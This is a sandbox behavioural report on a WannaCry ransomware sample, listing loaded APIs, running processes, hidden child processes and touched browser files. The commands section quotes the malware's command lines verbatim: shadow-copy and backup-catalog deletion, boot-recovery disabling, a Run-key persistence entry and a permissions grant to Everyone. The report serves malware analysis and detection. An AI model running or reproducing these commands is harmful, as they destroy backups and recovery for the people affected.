DynamicLoader: DNSAPI.dll/DnsGetProxyInformation
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: dhcpcsvc.DLL/DhcpRequestParams
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpSetStatusCallback
DynamicLoader: WININET.dll/InternetGetCookieExW
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: WINHTTP.dll/WinHttpAddRequestHeaders
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: USER32.dll/PeekMessageW
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetWindowLongPtrW
DynamicLoader: USER32.dll/RegisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowTextW
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/KillTimer
DynamicLoader: WS2_32.dll/
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WS2_32.dll/WSAGetOverlappedResult
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CLSIDFromOle1Class
DynamicLoader: CLBCatQ.DLL/GetCatalogObject
DynamicLoader: CLBCatQ.DLL/GetCatalogObject2
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: wininet.dll/DllGetClassObject
DynamicLoader: wininet.dll/DllCanUnloadNow
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wininet.dll/DllGetClassObject
DynamicLoader: wininet.dll/DllCanUnloadNow
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoImpersonateClient
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoRevertToSelf
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EqualSid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventUnregister
DynamicLoader: Secur32.dll/GetUserNameExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: OLEAUT32.dll/
DynamicLoader: Wtsapi32.dll/WTSEnumerateSessionsA
DynamicLoader: Wtsapi32.dll/WTSFreeMemory
DynamicLoader: WINSTA.dll/WinStationEnumerateW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/I_RpcExceptionFilter
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: WINSTA.dll/WinStationFreeMemory
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueA
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/CreateProcessAsUserA
DynamicLoader: kernel32.dll/WTSGetActiveConsoleSessionId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: Wtsapi32.dll/WTSQueryUserToken
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueA
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/CreateProcessAsUserA
DynamicLoader: kernel32.dll/WTSGetActiveConsoleSessionId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: Wtsapi32.dll/WTSQueryUserToken
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegisterTraceGuidsW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenThreadToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenProcessToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/AllocateAndInitializeSid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CheckTokenMembership
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/FreeSid
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsA
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: Wtsapi32.dll/WTSEnumerateSessionsA
DynamicLoader: Wtsapi32.dll/WTSFreeMemory
DynamicLoader: WINSTA.dll/WinStationEnumerateW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/I_RpcExceptionFilter
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: WINSTA.dll/WinStationFreeMemory
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueA
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/CreateProcessAsUserA
DynamicLoader: kernel32.dll/WTSGetActiveConsoleSessionId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: Wtsapi32.dll/WTSQueryUserToken
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueA
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/CreateProcessAsUserA
DynamicLoader: kernel32.dll/WTSGetActiveConsoleSessionId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: Wtsapi32.dll/WTSQueryUserToken
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegisterTraceGuidsW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenThreadToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenProcessToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/AllocateAndInitializeSid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CheckTokenMembership
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/FreeSid
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsA
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
Performs HTTP requests potentially not found in PCAP.
url: https://ocos-office365-s2s.msedge.net/
Resumed a thread in another process
thread_resumed: Process wannacry.exe with process ID 3040 resumed a thread in another process with the process ID 3040
thread_resumed: Process icacls.exe with process ID 664 resumed a thread in another process with the process ID 664
thread_resumed: Process cscript.exe with process ID 288 resumed a thread in another process with the process ID 288
thread_resumed: Process explorer.exe with process ID 1212 resumed a thread in another process with the process ID 2020
thread_resumed: Process cmd.exe with process ID 2440 resumed a thread in another process with the process ID 2124
thread_resumed: Process taskhsvc.exe with process ID 1144 resumed a thread in another process with the process ID 1144
thread_resumed: Process taskse.exe with process ID 2928 resumed a thread in another process with the process ID 2928
thread_resumed: Process dllhost.exe with process ID 2532 resumed a thread in another process with the process ID 2532
thread_resumed: Process vssadmin.exe with process ID 1036 resumed a thread in another process with the process ID 1036
thread_resumed: Process services.exe with process ID 432 resumed a thread in another process with the process ID 2540
thread_resumed: Process wmic.exe with process ID 2600 resumed a thread in another process with the process ID 2600
thread_resumed: Process wmiprvse.exe with process ID 1792 resumed a thread in another process with the process ID 1792
thread_resumed: Process taskse.exe with process ID 1336 resumed a thread in another process with the process ID 1336
thread_resumed: Process dllhost.exe with process ID 528 resumed a thread in another process with the process ID 528
thread_resumed: Process taskse.exe with process ID 1044 resumed a thread in another process with the process ID 1044
thread_resumed: Process taskse.exe with process ID 2260 resumed a thread in another process with the process ID 2260
Attempts to make a network connection via suspicious process
Enumerates running processes
process: System with pid 4
process: smss.exe with pid 216
process: csrss.exe with pid 292
process: wininit.exe with pid 340
process: csrss.exe with pid 352
process: winlogon.exe with pid 396
process: services.exe with pid 432
process: lsass.exe with pid 448
process: lsm.exe with pid 456
process: svchost.exe with pid 556
process: svchost.exe with pid 628
process: svchost.exe with pid 708
process: svchost.exe with pid 764
process: svchost.exe with pid 820
process: svchost.exe with pid 848
process: svchost.exe with pid 312
process: spoolsv.exe with pid 336
process: svchost.exe with pid 1084
process: taskhost.exe with pid 1092
process: dwm.exe with pid 1168
process: explorer.exe with pid 1212
process: OfficeClickToRun.exe with pid 1320
process: Sysmon64.exe with pid 1496
process: vlmcsd-Windows-x86.exe with pid 1536
process: pyw.exe with pid 1884
process: unsecapp.exe with pid 1908
process: pythonw.exe with pid 1928
process: svchost.exe with pid 1480
process: SearchIndexer.exe with pid 2092
process: svchost.exe with pid 900
process: wannacry.exe with pid 3040
process: SearchProtocolHost.exe with pid 2868
process: SearchFilterHost.exe with pid 2976
process: taskeng.exe with pid 1072
process: taskeng.exe with pid 2860
process: msoia.exe with pid 1868
process: msoia.exe with pid 584
process: OfficeC2RClient.exe with pid 1316
process: @WanaDecryptor@.exe with pid 1740
process: dllhost.exe with pid 2904
process: @WanaDecryptor@.exe with pid 2124
process: taskhsvc.exe with pid 1144
process: conhost.exe with pid 524
process: taskse.exe with pid 2928
process: @WanaDecryptor@.exe with pid 816
process: tdTRznO.exe with pid 1788
process: taskdl.exe with pid 2348
process: dllhost.exe with pid 2532
Reads data out of its own binary image
self_read: process: cscript.exe, pid: 288, offset: 0x00000000, length: 0x00000040
self_read: process: cscript.exe, pid: 288, offset: 0x3030785c3865785c, length: 0x00000018
self_read: process: cscript.exe, pid: 288, offset: 0x30785c5e3030785c, length: 0x00000018
self_read: process: cscript.exe, pid: 288, offset: 0x30785c5e3831785c, length: 0x00000008
self_read: process: cscript.exe, pid: 288, offset: 0x30785c613031785c, length: 0x00000010
self_read: process: cscript.exe, pid: 288, offset: 0x3130785c3065785c, length: 0x00000078
self_read: process: cscript.exe, pid: 288, offset: 0x785c3130785c5e58, length: 0x00000018
self_read: process: cscript.exe, pid: 288, offset: 0x785c3130785c5f50, length: 0x00000018
self_read: process: cscript.exe, pid: 288, offset: 0x785c3130785c6230, length: 0x00000012
Manipulates data from or to the Recycle Bin
file: C:\$Recycle.Bin\~SD7486.tmp
file: C:\$Recycle.Bin\~SD7486.tmp
file: C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500\~SD74A6.tmp
file: C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500\~SD74A6.tmp
file: C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD74B6.tmp
file: C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD74B6.tmp
file: C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500\~SD74D7.tmp
file: C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500\~SD74D7.tmp
A process created a hidden window
process: wannacry.exe -> attrib +h .
process: wannacry.exe -> icacls . /grant Everyone:F /T /C /Q
process: wannacry.exe -> taskdl.exe
process: wannacry.exe -> @WanaDecryptor@.exe fi
process: wannacry.exe -> 275781765172918.bat
process: wannacry.exe -> @WanaDecryptor@.exe co
process: wannacry.exe -> cmd.exe /c start /b @WanaDecryptor@.exe vs
process: wannacry.exe -> taskse.exe C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
process: wannacry.exe -> taskdl.exe
process: wannacry.exe -> taskse.exe C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
process: wannacry.exe -> taskdl.exe
process: wannacry.exe -> taskse.exe C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
process: wannacry.exe -> taskdl.exe
process: wannacry.exe -> taskse.exe C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
process: wannacry.exe -> taskdl.exe
process: wannacry.exe -> taskse.exe C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
process: @WanaDecryptor@.exe -> TaskData\Tor\taskhsvc.exe
process: @WanaDecryptor@.exe -> cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Multiple direct IP connections
direct_ip_connections: Made direct connections to 6 unique IP addresses
Checks for presence of debugger via IsDebuggerPresent
A scripting utility was executed
command: cscript.exe //nologo m.vbs
Uses Windows utilities for basic functionality
command: attrib +h .
command: C:\Windows\system32\cmd.exe /c 275781765172918.bat
command: cmd.exe /c start /b @WanaDecryptor@.exe vs
command: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qobyhffdhzmp201" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\tasksche.exe\"" /f
command: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qobyhffdhzmp201" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\tasksche.exe\"" /f
command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
command: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qobyhffdhzmp201" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\tasksche.exe\"" /f
command: wmic shadowcopy delete
command: wmic shadowcopy delete
command: C:\Windows\System32\Wbem\WMIC.exe wmic shadowcopy delete
command: C:\Windows\System32\Wbem\WMIC.exe wmic shadowcopy delete
Modifies boot configuration settings
disables_system_recovery: Modifies the boot configuration to disable startup recovery
ignorefailures: Modifies the boot configuration to disable Windows error recovery
Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config
regkeyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
Created a process from a suspicious location
file: C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
command: @WanaDecryptor@.exe vs
Steals private information from local Internet browsers
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt.WNCRY
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt.WNCRY
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt.WNCRY
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt.WNCRY
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt.WNCRY
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt.WNCRY
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
